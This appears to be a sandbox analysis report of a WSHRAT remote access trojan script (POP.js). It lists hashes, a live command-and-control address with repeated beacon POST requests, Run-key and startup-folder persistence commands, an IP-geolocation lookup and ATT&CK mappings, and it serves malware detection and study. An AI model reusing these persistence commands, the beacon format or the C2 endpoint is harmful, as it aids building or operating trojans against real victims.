wshrat | 8273cdbc9b9ebe69d2e208ed576d227903aa07839abe8ac292f732d677ae17e7

Analysis

max time kernel
148s
max time network
149s
platform
windows10-2004_x64
resource
win10v2004-20240802-en
resource tags

arch:x64arch:x86image:win10v2004-20240802-enlocale:en-usos:windows10-2004-x64system
submitted
03/10/2024, 11:36 UTC

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

POP.js
Size

903KB
MD5

e8b8ceb50d77284cb8124fb02e9f1268
SHA1

72ed9a12200a422140a33c504c0db91ea43a3623
SHA256

8273cdbc9b9ebe69d2e208ed576d227903aa07839abe8ac292f732d677ae17e7
SHA512

0fc4f2a9a5e8b42468f20808a228e38d1169c714ce709addfb453ce6fa6f1801f5743d3cec02c9bd63ac550f473bc0de4f675e1f0d470df4846e4d6f4b67d358
SSDEEP

6144:HQSQDBxonj7aB6Y+XMjIM8yDwGEmxu06wwKhgsaaSLZR2NRPIr3++OHoZ5aCtTKq:wSi2

Score

10^/10

wshrat execution persistence trojan

Malware Config

Extracted

Family

wshrat

http://37.48.102.22:1820

Signatures

WSHRAT
WSHRAT is a variant of Houdini worm and has vbs and js variants.
trojan wshrat

Blocklisted process makes network request 23 IoCs

flow	pid	Process
28	2960	wscript.exe
33	2960	wscript.exe
46	2960	wscript.exe
47	2960	wscript.exe
48	2960	wscript.exe
49	2960	wscript.exe
50	2960	wscript.exe
53	2960	wscript.exe
55	2960	wscript.exe
56	2960	wscript.exe
57	2960	wscript.exe
58	2960	wscript.exe
59	2960	wscript.exe
65	2960	wscript.exe
66	2960	wscript.exe
67	2960	wscript.exe
68	2960	wscript.exe
69	2960	wscript.exe
70	2960	wscript.exe
71	2960	wscript.exe
72	2960	wscript.exe
73	2960	wscript.exe
74	2960	wscript.exe

Checks computer location settings 2 TTPs 2 IoCs

Looks up country code configured in the registry, likely geofence.

Query Registry

T1012

System Information Discovery

T1082

description	ioc	Process
Key value queried	\REGISTRY\USER\S-1-5-21-523280732-2327480845-3730041215-1000\Control Panel\International\Geo\Nation	wscript.exe
Key value queried	\REGISTRY\USER\S-1-5-21-523280732-2327480845-3730041215-1000\Control Panel\International\Geo\Nation	wscript.exe

Drops startup file 2 IoCs

description	ioc	Process
File created	C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\POP.js	wscript.exe
File opened for modification	C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\POP.js	wscript.exe

Adds Run key to start application 2 TTPs 4 IoCs

persistence

Registry Run Keys / Startup Folder

T1547.001

Modify Registry

T1112

description	ioc	Process
Set value (str)	\REGISTRY\USER\S-1-5-21-523280732-2327480845-3730041215-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\POP = "wscript.exe //B \"C:\\Users\\Admin\\AppData\\Roaming\\POP.js\""	wscript.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\POP = "wscript.exe //B \"C:\\Users\\Admin\\AppData\\Roaming\\POP.js\""	wscript.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-523280732-2327480845-3730041215-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\POP = "wscript.exe //B \"C:\\Users\\Admin\\AppData\\Roaming\\POP.js\""	wscript.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\POP = "wscript.exe //B \"C:\\Users\\Admin\\AppData\\Roaming\\POP.js\""	wscript.exe

Looks up external IP address via web service 1 IoCs

Uses a legitimate IP lookup service to find the infected system's external IP.

flow	ioc
27	ip-api.com

Command and Scripting Interpreter: JavaScript 1 TTPs
execution

JavaScript
T1059.007
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082

Modifies registry class 2 IoCs

description	ioc	Process
Key created	\REGISTRY\USER\S-1-5-21-523280732-2327480845-3730041215-1000_Classes\Local Settings	wscript.exe
Key created	\REGISTRY\USER\S-1-5-21-523280732-2327480845-3730041215-1000_Classes\Local Settings	wscript.exe

Runs .reg file with regedit 2 IoCs

pid	Process
4836	regedit.exe
2812	regedit.exe

Script User-Agent 22 IoCs

Uses user-agent string associated with script host/environment.

description	flow	ioc
HTTP User-Agent header	74	WSHRAT\|E203BBB8\|KVIWLPUJ\|Admin\|Microsoft Windows 10 Pro\|plus\|nan-av\|false - 3/10/2024\|JavaScript-v3.4\|GB:United Kingdom
HTTP User-Agent header	47	WSHRAT\|E203BBB8\|KVIWLPUJ\|Admin\|Microsoft Windows 10 Pro\|plus\|nan-av\|false - 3/10/2024\|JavaScript-v3.4\|GB:United Kingdom
HTTP User-Agent header	49	WSHRAT\|E203BBB8\|KVIWLPUJ\|Admin\|Microsoft Windows 10 Pro\|plus\|nan-av\|false - 3/10/2024\|JavaScript-v3.4\|GB:United Kingdom
HTTP User-Agent header	56	WSHRAT\|E203BBB8\|KVIWLPUJ\|Admin\|Microsoft Windows 10 Pro\|plus\|nan-av\|false - 3/10/2024\|JavaScript-v3.4\|GB:United Kingdom
HTTP User-Agent header	69	WSHRAT\|E203BBB8\|KVIWLPUJ\|Admin\|Microsoft Windows 10 Pro\|plus\|nan-av\|false - 3/10/2024\|JavaScript-v3.4\|GB:United Kingdom
HTTP User-Agent header	71	WSHRAT\|E203BBB8\|KVIWLPUJ\|Admin\|Microsoft Windows 10 Pro\|plus\|nan-av\|false - 3/10/2024\|JavaScript-v3.4\|GB:United Kingdom
HTTP User-Agent header	59	WSHRAT\|E203BBB8\|KVIWLPUJ\|Admin\|Microsoft Windows 10 Pro\|plus\|nan-av\|false - 3/10/2024\|JavaScript-v3.4\|GB:United Kingdom
HTTP User-Agent header	65	WSHRAT\|E203BBB8\|KVIWLPUJ\|Admin\|Microsoft Windows 10 Pro\|plus\|nan-av\|false - 3/10/2024\|JavaScript-v3.4\|GB:United Kingdom
HTTP User-Agent header	72	WSHRAT\|E203BBB8\|KVIWLPUJ\|Admin\|Microsoft Windows 10 Pro\|plus\|nan-av\|false - 3/10/2024\|JavaScript-v3.4\|GB:United Kingdom
HTTP User-Agent header	68	WSHRAT\|E203BBB8\|KVIWLPUJ\|Admin\|Microsoft Windows 10 Pro\|plus\|nan-av\|false - 3/10/2024\|JavaScript-v3.4\|GB:United Kingdom
HTTP User-Agent header	70	WSHRAT\|E203BBB8\|KVIWLPUJ\|Admin\|Microsoft Windows 10 Pro\|plus\|nan-av\|false - 3/10/2024\|JavaScript-v3.4\|GB:United Kingdom
HTTP User-Agent header	73	WSHRAT\|E203BBB8\|KVIWLPUJ\|Admin\|Microsoft Windows 10 Pro\|plus\|nan-av\|false - 3/10/2024\|JavaScript-v3.4\|GB:United Kingdom
HTTP User-Agent header	33	WSHRAT\|E203BBB8\|KVIWLPUJ\|Admin\|Microsoft Windows 10 Pro\|plus\|nan-av\|false - 3/10/2024\|JavaScript-v3.4\|GB:United Kingdom
HTTP User-Agent header	53	WSHRAT\|E203BBB8\|KVIWLPUJ\|Admin\|Microsoft Windows 10 Pro\|plus\|nan-av\|false - 3/10/2024\|JavaScript-v3.4\|GB:United Kingdom
HTTP User-Agent header	57	WSHRAT\|E203BBB8\|KVIWLPUJ\|Admin\|Microsoft Windows 10 Pro\|plus\|nan-av\|false - 3/10/2024\|JavaScript-v3.4\|GB:United Kingdom
HTTP User-Agent header	58	WSHRAT\|E203BBB8\|KVIWLPUJ\|Admin\|Microsoft Windows 10 Pro\|plus\|nan-av\|false - 3/10/2024\|JavaScript-v3.4\|GB:United Kingdom
HTTP User-Agent header	66	WSHRAT\|E203BBB8\|KVIWLPUJ\|Admin\|Microsoft Windows 10 Pro\|plus\|nan-av\|false - 3/10/2024\|JavaScript-v3.4\|GB:United Kingdom
HTTP User-Agent header	46	WSHRAT\|E203BBB8\|KVIWLPUJ\|Admin\|Microsoft Windows 10 Pro\|plus\|nan-av\|false - 3/10/2024\|JavaScript-v3.4\|GB:United Kingdom
HTTP User-Agent header	48	WSHRAT\|E203BBB8\|KVIWLPUJ\|Admin\|Microsoft Windows 10 Pro\|plus\|nan-av\|false - 3/10/2024\|JavaScript-v3.4\|GB:United Kingdom
HTTP User-Agent header	50	WSHRAT\|E203BBB8\|KVIWLPUJ\|Admin\|Microsoft Windows 10 Pro\|plus\|nan-av\|false - 3/10/2024\|JavaScript-v3.4\|GB:United Kingdom
HTTP User-Agent header	55	WSHRAT\|E203BBB8\|KVIWLPUJ\|Admin\|Microsoft Windows 10 Pro\|plus\|nan-av\|false - 3/10/2024\|JavaScript-v3.4\|GB:United Kingdom
HTTP User-Agent header	67	WSHRAT\|E203BBB8\|KVIWLPUJ\|Admin\|Microsoft Windows 10 Pro\|plus\|nan-av\|false - 3/10/2024\|JavaScript-v3.4\|GB:United Kingdom

Suspicious use of WriteProcessMemory 6 IoCs

description	pid	Process	procid_target
PID 5040 wrote to memory of 4836	5040	wscript.exe	82
PID 5040 wrote to memory of 4836	5040	wscript.exe	82
PID 5040 wrote to memory of 2960	5040	wscript.exe	88
PID 5040 wrote to memory of 2960	5040	wscript.exe	88
PID 2960 wrote to memory of 2812	2960	wscript.exe	89
PID 2960 wrote to memory of 2812	2960	wscript.exe	89

C:\Windows\system32\wscript.exe
wscript.exe C:\Users\Admin\AppData\Local\Temp\POP.js
1⤵
- Checks computer location settings
- Drops startup file
- Adds Run key to start application
- Modifies registry class
- Suspicious use of WriteProcessMemory
PID:5040
- C:\Windows\regedit.exe
  "regedit.exe" "C:\Users\Admin\AppData\Local\Temp\ebgeaegdbdecaedfebace.reg"
  2⤵
  - Runs .reg file with regedit
  PID:4836
- C:\Windows\System32\wscript.exe
  "C:\Windows\System32\wscript.exe" //B "C:\Users\Admin\AppData\Roaming\POP.js"
  2⤵
  - Blocklisted process makes network request
  - Checks computer location settings
  - Drops startup file
  - Adds Run key to start application
  - Modifies registry class
  - Suspicious use of WriteProcessMemory
  PID:2960
- - C:\Windows\regedit.exe
    "regedit.exe" "C:\Users\Admin\AppData\Local\Temp\ebgeaegdbdecaedfebace.reg"
    3⤵
    - Runs .reg file with regedit
    PID:2812

Network

DNS

28.118.140.52.in-addr.arpa

Remote address:

8.8.8.8:53

Request

28.118.140.52.in-addr.arpa

IN PTR

Response
DNS

134.32.126.40.in-addr.arpa

Remote address:

8.8.8.8:53

Request

134.32.126.40.in-addr.arpa

IN PTR

Response
DNS

58.55.71.13.in-addr.arpa

Remote address:

8.8.8.8:53

Request

58.55.71.13.in-addr.arpa

IN PTR

Response
DNS

196.249.167.52.in-addr.arpa

Remote address:

8.8.8.8:53

Request

196.249.167.52.in-addr.arpa

IN PTR

Response
DNS

ip-api.com

wscript.exe

Remote address:

8.8.8.8:53

Request

ip-api.com

IN A

Response

ip-api.com

IN A

208.95.112.1
GET

http://ip-api.com/json/

wscript.exe

Remote address:

208.95.112.1:80

Request

GET /json/ HTTP/1.1
Accept: */*
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/73.0.3683.86 Safari/537.36
Accept-Language: en-us
UA-CPU: AMD64
Accept-Encoding: gzip, deflate
Host: ip-api.com
Connection: Keep-Alive

Response

HTTP/1.1 200 OK

Date: Thu, 03 Oct 2024 11:36:36 GMT
Content-Type: application/json; charset=utf-8
Content-Length: 289
Access-Control-Allow-Origin: *
X-Ttl: 59
X-Rl: 43
DNS

154.239.44.20.in-addr.arpa

Remote address:

8.8.8.8:53

Request

154.239.44.20.in-addr.arpa

IN PTR

Response
DNS

1.112.95.208.in-addr.arpa

Remote address:

8.8.8.8:53

Request

1.112.95.208.in-addr.arpa

IN PTR

Response

1.112.95.208.in-addr.arpa

IN PTR

ip-apicom
POST

http://37.48.102.22:1820/is-ready

wscript.exe

Remote address:

37.48.102.22:1820

Request

POST /is-ready HTTP/1.1
Accept: */*
user-agent: WSHRAT|E203BBB8|KVIWLPUJ|Admin|Microsoft Windows 10 Pro|plus|nan-av|false - 3/10/2024|JavaScript-v3.4|GB:United Kingdom
Accept-Language: en-us
UA-CPU: AMD64
Accept-Encoding: gzip, deflate
Host: 37.48.102.22:1820
Content-Length: 0
Connection: Keep-Alive
Cache-Control: no-cache
DNS

22.102.48.37.in-addr.arpa

Remote address:

8.8.8.8:53

Request

22.102.48.37.in-addr.arpa

IN PTR

Response
DNS

200.163.202.172.in-addr.arpa

Remote address:

8.8.8.8:53

Request

200.163.202.172.in-addr.arpa

IN PTR

Response
DNS

241.42.69.40.in-addr.arpa

Remote address:

8.8.8.8:53

Request

241.42.69.40.in-addr.arpa

IN PTR

Response
DNS

66.209.201.84.in-addr.arpa

Remote address:

8.8.8.8:53

Request

66.209.201.84.in-addr.arpa

IN PTR

Response
POST

http://37.48.102.22:1820/is-ready

wscript.exe

Remote address:

37.48.102.22:1820

Request

POST /is-ready HTTP/1.1
Accept: */*
user-agent: WSHRAT|E203BBB8|KVIWLPUJ|Admin|Microsoft Windows 10 Pro|plus|nan-av|false - 3/10/2024|JavaScript-v3.4|GB:United Kingdom
Accept-Language: en-us
UA-CPU: AMD64
Accept-Encoding: gzip, deflate
Host: 37.48.102.22:1820
Content-Length: 0
Connection: Keep-Alive
Cache-Control: no-cache
POST

http://37.48.102.22:1820/is-ready

wscript.exe

Remote address:

37.48.102.22:1820

Request

POST /is-ready HTTP/1.1
Accept: */*
user-agent: WSHRAT|E203BBB8|KVIWLPUJ|Admin|Microsoft Windows 10 Pro|plus|nan-av|false - 3/10/2024|JavaScript-v3.4|GB:United Kingdom
Accept-Language: en-us
UA-CPU: AMD64
Accept-Encoding: gzip, deflate
Host: 37.48.102.22:1820
Content-Length: 0
Connection: Keep-Alive
Cache-Control: no-cache
POST

http://37.48.102.22:1820/is-ready

wscript.exe

Remote address:

37.48.102.22:1820

Request

POST /is-ready HTTP/1.1
Accept: */*
user-agent: WSHRAT|E203BBB8|KVIWLPUJ|Admin|Microsoft Windows 10 Pro|plus|nan-av|false - 3/10/2024|JavaScript-v3.4|GB:United Kingdom
Accept-Language: en-us
UA-CPU: AMD64
Accept-Encoding: gzip, deflate
Host: 37.48.102.22:1820
Content-Length: 0
Connection: Keep-Alive
Cache-Control: no-cache
POST

http://37.48.102.22:1820/is-ready

wscript.exe

Remote address:

37.48.102.22:1820

Request

POST /is-ready HTTP/1.1
Accept: */*
user-agent: WSHRAT|E203BBB8|KVIWLPUJ|Admin|Microsoft Windows 10 Pro|plus|nan-av|false - 3/10/2024|JavaScript-v3.4|GB:United Kingdom
Accept-Language: en-us
UA-CPU: AMD64
Accept-Encoding: gzip, deflate
Host: 37.48.102.22:1820
Content-Length: 0
Connection: Keep-Alive
Cache-Control: no-cache
POST

http://37.48.102.22:1820/is-ready

wscript.exe

Remote address:

37.48.102.22:1820

Request

POST /is-ready HTTP/1.1
Accept: */*
user-agent: WSHRAT|E203BBB8|KVIWLPUJ|Admin|Microsoft Windows 10 Pro|plus|nan-av|false - 3/10/2024|JavaScript-v3.4|GB:United Kingdom
Accept-Language: en-us
UA-CPU: AMD64
Accept-Encoding: gzip, deflate
Host: 37.48.102.22:1820
Content-Length: 0
Connection: Keep-Alive
Cache-Control: no-cache
POST

http://37.48.102.22:1820/is-ready

wscript.exe

Remote address:

37.48.102.22:1820

Request

POST /is-ready HTTP/1.1
Accept: */*
user-agent: WSHRAT|E203BBB8|KVIWLPUJ|Admin|Microsoft Windows 10 Pro|plus|nan-av|false - 3/10/2024|JavaScript-v3.4|GB:United Kingdom
Accept-Language: en-us
UA-CPU: AMD64
Accept-Encoding: gzip, deflate
Host: 37.48.102.22:1820
Content-Length: 0
Connection: Keep-Alive
Cache-Control: no-cache
DNS

88.210.23.2.in-addr.arpa

Remote address:

8.8.8.8:53

Request

88.210.23.2.in-addr.arpa

IN PTR

Response

88.210.23.2.in-addr.arpa

IN PTR

a2-23-210-88deploystaticakamaitechnologiescom
POST

http://37.48.102.22:1820/is-ready

wscript.exe

Remote address:

37.48.102.22:1820

Request

POST /is-ready HTTP/1.1
Accept: */*
user-agent: WSHRAT|E203BBB8|KVIWLPUJ|Admin|Microsoft Windows 10 Pro|plus|nan-av|false - 3/10/2024|JavaScript-v3.4|GB:United Kingdom
Accept-Language: en-us
UA-CPU: AMD64
Accept-Encoding: gzip, deflate
Host: 37.48.102.22:1820
Content-Length: 0
Connection: Keep-Alive
Cache-Control: no-cache
POST

http://37.48.102.22:1820/is-ready

wscript.exe

Remote address:

37.48.102.22:1820

Request

POST /is-ready HTTP/1.1
Accept: */*
user-agent: WSHRAT|E203BBB8|KVIWLPUJ|Admin|Microsoft Windows 10 Pro|plus|nan-av|false - 3/10/2024|JavaScript-v3.4|GB:United Kingdom
Accept-Language: en-us
UA-CPU: AMD64
Accept-Encoding: gzip, deflate
Host: 37.48.102.22:1820
Content-Length: 0
Connection: Keep-Alive
Cache-Control: no-cache
POST

http://37.48.102.22:1820/is-ready

wscript.exe

Remote address:

37.48.102.22:1820

Request

POST /is-ready HTTP/1.1
Accept: */*
user-agent: WSHRAT|E203BBB8|KVIWLPUJ|Admin|Microsoft Windows 10 Pro|plus|nan-av|false - 3/10/2024|JavaScript-v3.4|GB:United Kingdom
Accept-Language: en-us
UA-CPU: AMD64
Accept-Encoding: gzip, deflate
Host: 37.48.102.22:1820
Content-Length: 0
Connection: Keep-Alive
Cache-Control: no-cache
POST

http://37.48.102.22:1820/is-ready

wscript.exe

Remote address:

37.48.102.22:1820

Request

POST /is-ready HTTP/1.1
Accept: */*
user-agent: WSHRAT|E203BBB8|KVIWLPUJ|Admin|Microsoft Windows 10 Pro|plus|nan-av|false - 3/10/2024|JavaScript-v3.4|GB:United Kingdom
Accept-Language: en-us
UA-CPU: AMD64
Accept-Encoding: gzip, deflate
Host: 37.48.102.22:1820
Content-Length: 0
Connection: Keep-Alive
Cache-Control: no-cache
POST

http://37.48.102.22:1820/is-ready

wscript.exe

Remote address:

37.48.102.22:1820

Request

POST /is-ready HTTP/1.1
Accept: */*
user-agent: WSHRAT|E203BBB8|KVIWLPUJ|Admin|Microsoft Windows 10 Pro|plus|nan-av|false - 3/10/2024|JavaScript-v3.4|GB:United Kingdom
Accept-Language: en-us
UA-CPU: AMD64
Accept-Encoding: gzip, deflate
Host: 37.48.102.22:1820
Content-Length: 0
Connection: Keep-Alive
Cache-Control: no-cache
DNS

172.210.232.199.in-addr.arpa

Remote address:

8.8.8.8:53

Request

172.210.232.199.in-addr.arpa

IN PTR

Response
POST

http://37.48.102.22:1820/is-ready

wscript.exe

Remote address:

37.48.102.22:1820

Request

POST /is-ready HTTP/1.1
Accept: */*
user-agent: WSHRAT|E203BBB8|KVIWLPUJ|Admin|Microsoft Windows 10 Pro|plus|nan-av|false - 3/10/2024|JavaScript-v3.4|GB:United Kingdom
Accept-Language: en-us
UA-CPU: AMD64
Accept-Encoding: gzip, deflate
Host: 37.48.102.22:1820
Content-Length: 0
Connection: Keep-Alive
Cache-Control: no-cache
POST

http://37.48.102.22:1820/is-ready

wscript.exe

Remote address:

37.48.102.22:1820

Request

POST /is-ready HTTP/1.1
Accept: */*
user-agent: WSHRAT|E203BBB8|KVIWLPUJ|Admin|Microsoft Windows 10 Pro|plus|nan-av|false - 3/10/2024|JavaScript-v3.4|GB:United Kingdom
Accept-Language: en-us
UA-CPU: AMD64
Accept-Encoding: gzip, deflate
Host: 37.48.102.22:1820
Content-Length: 0
Connection: Keep-Alive
Cache-Control: no-cache
POST

http://37.48.102.22:1820/is-ready

wscript.exe

Remote address:

37.48.102.22:1820

Request

POST /is-ready HTTP/1.1
Accept: */*
user-agent: WSHRAT|E203BBB8|KVIWLPUJ|Admin|Microsoft Windows 10 Pro|plus|nan-av|false - 3/10/2024|JavaScript-v3.4|GB:United Kingdom
Accept-Language: en-us
UA-CPU: AMD64
Accept-Encoding: gzip, deflate
Host: 37.48.102.22:1820
Content-Length: 0
Connection: Keep-Alive
Cache-Control: no-cache
POST

http://37.48.102.22:1820/is-ready

wscript.exe

Remote address:

37.48.102.22:1820

Request

POST /is-ready HTTP/1.1
Accept: */*
user-agent: WSHRAT|E203BBB8|KVIWLPUJ|Admin|Microsoft Windows 10 Pro|plus|nan-av|false - 3/10/2024|JavaScript-v3.4|GB:United Kingdom
Accept-Language: en-us
UA-CPU: AMD64
Accept-Encoding: gzip, deflate
Host: 37.48.102.22:1820
Content-Length: 0
Connection: Keep-Alive
Cache-Control: no-cache
POST

http://37.48.102.22:1820/is-ready

wscript.exe

Remote address:

37.48.102.22:1820

Request

POST /is-ready HTTP/1.1
Accept: */*
user-agent: WSHRAT|E203BBB8|KVIWLPUJ|Admin|Microsoft Windows 10 Pro|plus|nan-av|false - 3/10/2024|JavaScript-v3.4|GB:United Kingdom
Accept-Language: en-us
UA-CPU: AMD64
Accept-Encoding: gzip, deflate
Host: 37.48.102.22:1820
Content-Length: 0
Connection: Keep-Alive
Cache-Control: no-cache
POST

http://37.48.102.22:1820/is-ready

wscript.exe

Remote address:

37.48.102.22:1820

Request

POST /is-ready HTTP/1.1
Accept: */*
user-agent: WSHRAT|E203BBB8|KVIWLPUJ|Admin|Microsoft Windows 10 Pro|plus|nan-av|false - 3/10/2024|JavaScript-v3.4|GB:United Kingdom
Accept-Language: en-us
UA-CPU: AMD64
Accept-Encoding: gzip, deflate
Host: 37.48.102.22:1820
Content-Length: 0
Connection: Keep-Alive
Cache-Control: no-cache
POST

http://37.48.102.22:1820/is-ready

wscript.exe

Remote address:

37.48.102.22:1820

Request

POST /is-ready HTTP/1.1
Accept: */*
user-agent: WSHRAT|E203BBB8|KVIWLPUJ|Admin|Microsoft Windows 10 Pro|plus|nan-av|false - 3/10/2024|JavaScript-v3.4|GB:United Kingdom
Accept-Language: en-us
UA-CPU: AMD64
Accept-Encoding: gzip, deflate
Host: 37.48.102.22:1820
Content-Length: 0
Connection: Keep-Alive
Cache-Control: no-cache
POST

http://37.48.102.22:1820/is-ready

wscript.exe

Remote address:

37.48.102.22:1820

Request

POST /is-ready HTTP/1.1
Accept: */*
user-agent: WSHRAT|E203BBB8|KVIWLPUJ|Admin|Microsoft Windows 10 Pro|plus|nan-av|false - 3/10/2024|JavaScript-v3.4|GB:United Kingdom
Accept-Language: en-us
UA-CPU: AMD64
Accept-Encoding: gzip, deflate
Host: 37.48.102.22:1820
Content-Length: 0
Connection: Keep-Alive
Cache-Control: no-cache
POST

http://37.48.102.22:1820/is-ready

wscript.exe

Remote address:

37.48.102.22:1820

Request

POST /is-ready HTTP/1.1
Accept: */*
user-agent: WSHRAT|E203BBB8|KVIWLPUJ|Admin|Microsoft Windows 10 Pro|plus|nan-av|false - 3/10/2024|JavaScript-v3.4|GB:United Kingdom
Accept-Language: en-us
UA-CPU: AMD64
Accept-Encoding: gzip, deflate
Host: 37.48.102.22:1820
Content-Length: 0
Connection: Keep-Alive
Cache-Control: no-cache
POST

http://37.48.102.22:1820/is-ready

wscript.exe

Remote address:

37.48.102.22:1820

Request

POST /is-ready HTTP/1.1
Accept: */*
user-agent: WSHRAT|E203BBB8|KVIWLPUJ|Admin|Microsoft Windows 10 Pro|plus|nan-av|false - 3/10/2024|JavaScript-v3.4|GB:United Kingdom
Accept-Language: en-us
UA-CPU: AMD64
Accept-Encoding: gzip, deflate
Host: 37.48.102.22:1820
Content-Length: 0
Connection: Keep-Alive
Cache-Control: no-cache

208.95.112.1:80

http://ip-api.com/json/

http

wscript.exe

830 B
598 B
6
3

HTTP Request

GET http://ip-api.com/json/

HTTP Response

200
37.48.102.22:1820

http://37.48.102.22:1820/is-ready

http

wscript.exe

567 B
172 B
5
4

HTTP Request

POST http://37.48.102.22:1820/is-ready
37.48.102.22:1820

http://37.48.102.22:1820/is-ready

http

wscript.exe

567 B
172 B
5
4

HTTP Request

POST http://37.48.102.22:1820/is-ready
37.48.102.22:1820

http://37.48.102.22:1820/is-ready

http

wscript.exe

567 B
172 B
5
4

HTTP Request

POST http://37.48.102.22:1820/is-ready
37.48.102.22:1820

http://37.48.102.22:1820/is-ready

http

wscript.exe

567 B
172 B
5
4

HTTP Request

POST http://37.48.102.22:1820/is-ready
37.48.102.22:1820

http://37.48.102.22:1820/is-ready

http

wscript.exe

619 B
172 B
6
4

HTTP Request

POST http://37.48.102.22:1820/is-ready
37.48.102.22:1820

http://37.48.102.22:1820/is-ready

http

wscript.exe

567 B
172 B
5
4

HTTP Request

POST http://37.48.102.22:1820/is-ready
37.48.102.22:1820

http://37.48.102.22:1820/is-ready

http

wscript.exe

567 B
172 B
5
4

HTTP Request

POST http://37.48.102.22:1820/is-ready
37.48.102.22:1820

http://37.48.102.22:1820/is-ready

http

wscript.exe

567 B
172 B
5
4

HTTP Request

POST http://37.48.102.22:1820/is-ready
37.48.102.22:1820

http://37.48.102.22:1820/is-ready

http

wscript.exe

567 B
172 B
5
4

HTTP Request

POST http://37.48.102.22:1820/is-ready
37.48.102.22:1820

http://37.48.102.22:1820/is-ready

http

wscript.exe

567 B
172 B
5
4

HTTP Request

POST http://37.48.102.22:1820/is-ready
37.48.102.22:1820

http://37.48.102.22:1820/is-ready

http

wscript.exe

567 B
172 B
5
4

HTTP Request

POST http://37.48.102.22:1820/is-ready
37.48.102.22:1820

http://37.48.102.22:1820/is-ready

http

wscript.exe

567 B
172 B
5
4

HTTP Request

POST http://37.48.102.22:1820/is-ready
37.48.102.22:1820

http://37.48.102.22:1820/is-ready

http

wscript.exe

567 B
172 B
5
4

HTTP Request

POST http://37.48.102.22:1820/is-ready
37.48.102.22:1820

http://37.48.102.22:1820/is-ready

http

wscript.exe

567 B
172 B
5
4

HTTP Request

POST http://37.48.102.22:1820/is-ready
37.48.102.22:1820

http://37.48.102.22:1820/is-ready

http

wscript.exe

567 B
172 B
5
4

HTTP Request

POST http://37.48.102.22:1820/is-ready
37.48.102.22:1820

http://37.48.102.22:1820/is-ready

http

wscript.exe

567 B
172 B
5
4

HTTP Request

POST http://37.48.102.22:1820/is-ready
37.48.102.22:1820

http://37.48.102.22:1820/is-ready

http

wscript.exe

567 B
172 B
5
4

HTTP Request

POST http://37.48.102.22:1820/is-ready
37.48.102.22:1820

http://37.48.102.22:1820/is-ready

http

wscript.exe

567 B
172 B
5
4

HTTP Request

POST http://37.48.102.22:1820/is-ready
37.48.102.22:1820

http://37.48.102.22:1820/is-ready

http

wscript.exe

567 B
172 B
5
4

HTTP Request

POST http://37.48.102.22:1820/is-ready
37.48.102.22:1820

http://37.48.102.22:1820/is-ready

http

wscript.exe

567 B
172 B
5
4

HTTP Request

POST http://37.48.102.22:1820/is-ready
37.48.102.22:1820

http://37.48.102.22:1820/is-ready

http

wscript.exe

567 B
172 B
5
4

HTTP Request

POST http://37.48.102.22:1820/is-ready
37.48.102.22:1820

http://37.48.102.22:1820/is-ready

http

wscript.exe

475 B
92 B
3
2

HTTP Request

POST http://37.48.102.22:1820/is-ready

8.8.8.8:53

28.118.140.52.in-addr.arpa

dns

72 B
158 B
1
1

DNS Request

28.118.140.52.in-addr.arpa
8.8.8.8:53

134.32.126.40.in-addr.arpa

dns

72 B
158 B
1
1

DNS Request

134.32.126.40.in-addr.arpa
8.8.8.8:53

58.55.71.13.in-addr.arpa

dns

70 B
144 B
1
1

DNS Request

58.55.71.13.in-addr.arpa
8.8.8.8:53

196.249.167.52.in-addr.arpa

dns

73 B
147 B
1
1

DNS Request

196.249.167.52.in-addr.arpa
8.8.8.8:53

ip-api.com

dns

wscript.exe

56 B
72 B
1
1

DNS Request

ip-api.com

DNS Response

208.95.112.1
8.8.8.8:53

154.239.44.20.in-addr.arpa

dns

72 B
158 B
1
1

DNS Request

154.239.44.20.in-addr.arpa
8.8.8.8:53

1.112.95.208.in-addr.arpa

dns

71 B
95 B
1
1

DNS Request

1.112.95.208.in-addr.arpa
8.8.8.8:53

22.102.48.37.in-addr.arpa

dns

71 B
133 B
1
1

DNS Request

22.102.48.37.in-addr.arpa
8.8.8.8:53

200.163.202.172.in-addr.arpa

dns

74 B
160 B
1
1

DNS Request

200.163.202.172.in-addr.arpa
8.8.8.8:53

241.42.69.40.in-addr.arpa

dns

71 B
145 B
1
1

DNS Request

241.42.69.40.in-addr.arpa
8.8.8.8:53

66.209.201.84.in-addr.arpa

dns

72 B
132 B
1
1

DNS Request

66.209.201.84.in-addr.arpa
8.8.8.8:53

88.210.23.2.in-addr.arpa

dns

70 B
133 B
1
1

DNS Request

88.210.23.2.in-addr.arpa
8.8.8.8:53

172.210.232.199.in-addr.arpa

dns

74 B
128 B
1
1

DNS Request

172.210.232.199.in-addr.arpa

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Command and Scripting Interpreter

T1059

JavaScript

T1059.007

Persistence

Boot or Logon Autostart Execution

T1547

Registry Run Keys / Startup Folder

T1547.001

Privilege Escalation

Boot or Logon Autostart Execution

T1547

Registry Run Keys / Startup Folder

T1547.001

Defense Evasion

Modify Registry

T1112

Credential Access

Discovery

Query Registry

T1012

System Information Discovery

T1082

Lateral Movement

Collection

Command and Control

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Local\Temp\ebgeaegdbdecaedfebace.reg

Filesize
143B

MD5
0e5411d7ecba9a435afda71c6c39d8fd

SHA1
2d6812052bf7be1b5e213e1d813ae39faa07284c

SHA256
cb68d50df5817e51ec5b2f72893dc4c749bf3504519107e0a78dda84d55f09e2

SHA512
903ac6e5c8a12607af267b54bcbbedfa5542c5b4f7ea289ab7c6a32a424d5b846ae406d830cb4ad48e2b46f92c504163c0856af8c3e09685a8855f39f616ddb1

Download Submit
C:\Users\Admin\AppData\Roaming\POP.js

Filesize
903KB

MD5
e8b8ceb50d77284cb8124fb02e9f1268

SHA1
72ed9a12200a422140a33c504c0db91ea43a3623

SHA256
